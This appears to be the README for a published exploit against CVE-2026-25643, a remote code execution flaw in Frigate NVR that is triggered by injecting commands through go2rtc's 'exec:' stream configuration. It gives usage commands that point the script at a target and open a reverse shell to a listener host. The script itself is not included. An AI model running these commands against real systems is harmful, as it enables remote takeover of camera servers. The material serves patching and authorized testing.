# CVE-2026-25643: Frigate NVR \<= 0.16.3 Authenticated RCE

**Exploit Title:** Frigate NVR \<= 0.16.3 - Authenticated Remote Code
Execution\
**Date:** 2026-02-05\
**Exploit Author:** jduardo2704\
**Vendor Homepage:** https://frigate.video/ \
**Software Link:** https://github.com/blakeblackshear/frigate \
**Version:** <= 0.16.3 \
**CVE:** CVE-2026-25643
**Advisory:** https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

## Description

Frigate versions up to 0.16.3 are vulnerable to Remote Code Execution
(RCE) via the `go2rtc` configuration. An attacker with authenticated
access (or unauthenticated if the instance is exposed) can inject system
commands into the stream configuration using the `exec:` protocol. This
exploit automates the payload injection, restarts the service, and
catches the reverse shell.

## Installation

``` bash
pip install requests pyyaml
```

## Usage

### Authenticated Mode:

``` bash
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
```

### Unauthenticated Mode (if exposed):

``` bash
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
```

## Disclaimer

This script is for educational purposes and authorized security testing
only.
